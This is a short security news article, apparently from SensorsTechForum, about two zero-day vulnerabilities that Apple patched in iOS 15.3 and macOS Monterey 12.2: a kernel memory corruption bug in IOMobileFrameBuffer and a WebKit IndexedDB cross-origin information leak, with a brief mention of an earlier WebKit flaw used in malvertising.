Apple recently released new versions of its operating systems – iOS 15.3 and macOS Monterey 12.2, which contained a number of fixes, including two zero-days.
CVE-2022-22587
The first zero-day is related to memory corruption, and could allow a malicious app to execute arbitrary code with kernel privileges. The vulnerability exists in the IOMobileFrameBuffer, which is a kernel extension enabling developers to control the way a device’s memory handles the screen display, also known as a framebuffer.
The CVE-2022-22587 bug impacts iOS, iPadOS and macOS Monterey, with the fix for it including an improved input validation. It is likely that the flaw was exploited in the wild. Also note thatthe update is available for iPhone 6s and later, all models of iPad Pro, iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and the seventh generation of iPod touch.
CVE-2022-22594
The second zero-day fixed this month is CVE-2022-22594, а WebKit information disclosure vulnerability in Safari. The issue affects Safari for macOS, iOS and iPadOS. It was disclosed by FingerprintJS researchers, and it could allow a snooping website discover information about other tabs the user might have opened.
The vulnerability can be described as a cross-origin policy violation in the IndexDB API, which is a JavaScript API which browsers use to manage a NoSQL database of JSON objects. The issue was fixed with input validation.
Patches for the vulnerabilities are available in the macOS Monterey 12.2 and the iOS/iPadOS 15.3 updates. iOS 15.3 also has fixes for issues related to gaining root privileges, arbitrary code execution with kernel privileges, and being able to obtain user files via iCloud.
It is noteworthy that attackers used another macOS WebKit bug, CVE-2021-1801, to carry out malvertising campaigns last year. The flaw affected the iframe sandboxing policy by using maliciously crafted web content, which was fixed with improved iframe sandbox enforcement. The vulnerability allowed threat actors to bypass the iframe sandboxing policy the WebKit browser engine powering Safari and Google Chrome.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me: